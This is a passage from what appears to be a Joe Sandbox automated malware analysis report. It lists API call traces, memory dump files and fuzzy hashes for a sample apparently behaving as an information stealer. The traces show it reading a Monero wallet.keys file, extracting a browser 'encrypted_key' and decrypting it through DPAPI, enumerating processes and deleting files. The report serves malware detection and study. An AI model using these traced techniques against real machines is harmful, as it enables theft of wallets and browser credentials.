                              • lstrlen.KERNEL32(00000000), ref: 0012D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0012DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: adc5d87fa4b6d630dd6bfc1e6393d81b54b2abf743f1327c3952232ae7ddbf0c
                              • Instruction ID: 0fd299f3ae42378527bf85d0bacfe53e61d9c6e2c53855bfdf7dc01e62594fe6
                              • Opcode Fuzzy Hash: adc5d87fa4b6d630dd6bfc1e6393d81b54b2abf743f1327c3952232ae7ddbf0c
                              • Instruction Fuzzy Hash: 6B811572910118ABDB05FBA4DC96EEE733CAF24301F904568F547B7091EF746A09DBA2
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00141580,00140D92), ref: 0012F54C
                              • lstrlen.KERNEL32(00000000), ref: 0012F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 3bd715fe8655244bb68249ee062c14270563e4b2f26bef0abbe2a7a4ffccde74
                              • Instruction ID: b55d72606e14c63905c0263a9cf55cade023cdc2bec841cd2c73fbefa65b76a8
                              • Opcode Fuzzy Hash: 3bd715fe8655244bb68249ee062c14270563e4b2f26bef0abbe2a7a4ffccde74
                              • Instruction Fuzzy Hash: 1B51E171D10108ABDB04FBF4EC96DED7379AF64300F808568F956A7191EF346A19CBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: de051aaaf1f13d6950395b75a2cccff23ab5f8e7239c63f3b5b7180c243c48f1
                              • Instruction ID: 2e63ed2acd2df73d0b83a03c27ff86f52707bcfa3cf35a90715b47d73d376e35
                              • Opcode Fuzzy Hash: de051aaaf1f13d6950395b75a2cccff23ab5f8e7239c63f3b5b7180c243c48f1
                              • Instruction Fuzzy Hash: ED4172B1D10109AFCB04EFE5D886AFEB774AF58304F408418F51677251DB75AA09CFA6
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D39
                                • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                                • Part of subcall function 00129AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                                • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                                • Part of subcall function 00129AC0: LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                                • Part of subcall function 00129B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B84
                                • Part of subcall function 00129B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00129BA3
                                • Part of subcall function 00129B60: LocalFree.KERNEL32(?), ref: 00129BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: c873ca61742c96c31498d4a15500b8eb8ae758db284da197ec43ee85959320ab
                              • Instruction ID: 388b7fd6718e6a016569780c2a3756536e966509865bfa4bbf59caf5ee809958
                              • Opcode Fuzzy Hash: c873ca61742c96c31498d4a15500b8eb8ae758db284da197ec43ee85959320ab
                              • Instruction Fuzzy Hash: 74311CB6D1021DABCF04DBE8EC85FEEB7B8AF58304F144519E905A7241EB709A54CBA1
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001405B7), ref: 001386CA
                              • Process32First.KERNEL32(?,00000128), ref: 001386DE
                              • Process32Next.KERNEL32(?,00000128), ref: 001386F3
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • CloseHandle.KERNEL32(?), ref: 00138761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: bf8071f652ef7841f4cc3299d500f7ed52a4139b731ab474d8aa5c6757a25477
                              • Instruction ID: daddc130a7366ff92a93d048a902fa16e988096b1ab6040cabcdab4ac9f762c1
                              • Opcode Fuzzy Hash: bf8071f652ef7841f4cc3299d500f7ed52a4139b731ab474d8aa5c6757a25477
                              • Instruction Fuzzy Hash: 96316871901218ABCB25EF90DC91FEEB778EF59700F5081A9F10AB21A0DB706A45CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00140E00,00000000,?), ref: 001379B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001379B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00140E00,00000000,?), ref: 001379C4
                              • wsprintfA.USER32 ref: 001379F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 5ba5530d34ab1190a7a4d648cc9913f2eba15daaf4dc5b1b4581749705702735
                              • Instruction ID: 691ec6cdae4f213b9700234fccd63293175673b5c5eca9f6645c2b8ea2915c06
                              • Opcode Fuzzy Hash: 5ba5530d34ab1190a7a4d648cc9913f2eba15daaf4dc5b1b4581749705702735
                              • Instruction Fuzzy Hash: D51118B2904518AACB149FC9ED45BBEBBFCEB48B11F10411AF605A2280D3795940CBB1
                              APIs
                              • CreateFileA.KERNEL32(00133AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00133AEE,?), ref: 001392FC
                              • GetFileSizeEx.KERNEL32(000000FF,00133AEE), ref: 00139319
                              • CloseHandle.KERNEL32(000000FF), ref: 00139327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: ae1bb899389c2c1ba8528cbf6dbf0585b51dff921dab19de5dd5a5b4b783e74c
                              • Instruction ID: 3bf44bd0f112e297bbf3f7db0b05bc07434180030ad7f62ab24677ce23c8b951
                              • Opcode Fuzzy Hash: ae1bb899389c2c1ba8528cbf6dbf0585b51dff921dab19de5dd5a5b4b783e74c
                              • Instruction Fuzzy Hash: D1F037B9E44208BBDB14DBF0DC49B9E77B9BB48720F11C254FA51B72C0DAB0AA018F45
                              APIs
                              • __getptd.LIBCMT ref: 0013C74E
                                • Part of subcall function 0013BF9F: __amsg_exit.LIBCMT ref: 0013BFAF
                              • __getptd.LIBCMT ref: 0013C765
                              • __amsg_exit.LIBCMT ref: 0013C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0013C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 4c566a9830292a99c318934aeebd1157e3549e6ae0b12fa81be639d157bfc550
                              • Instruction ID: 5de4c3afd4347153f745e81d9ca160f708ee7f81389da08f4b0ff1ec23867815
                              • Opcode Fuzzy Hash: 4c566a9830292a99c318934aeebd1157e3549e6ae0b12fa81be639d157bfc550
                              • Instruction Fuzzy Hash: 9FF0B4329083009BE721BBB8588775E37A06F10720F214149F904B72E2DB6459419FD6
                              APIs
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00134F7A
                              • lstrcat.KERNEL32(?,00141070), ref: 00134F97
                              • lstrcat.KERNEL32(?,00FF9098), ref: 00134FAB
                              • lstrcat.KERNEL32(?,00141074), ref: 00134FBD
                                • Part of subcall function 00134910: wsprintfA.USER32 ref: 0013492C
                                • Part of subcall function 00134910: FindFirstFileA.KERNEL32(?,?), ref: 00134943
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                                • Part of subcall function 00134910: FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                                • Part of subcall function 00134910: FindClose.KERNEL32(000000FF), ref: 00134B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: a60c91ba3aa04d565cfcf5278e8eafd8f0208f7b16be32ecf58302250f671298
                              • Instruction ID: 6fe309fc72df74a1268157b22e813a63da9d0445af8a9607dbc9e3595d2a7f2f
                              • Opcode Fuzzy Hash: a60c91ba3aa04d565cfcf5278e8eafd8f0208f7b16be32ecf58302250f671298
                              • Instruction Fuzzy Hash: 81219B7690021467C755F7B0EC46EED377CAB65300F008598F69AA3191EFB596C88F92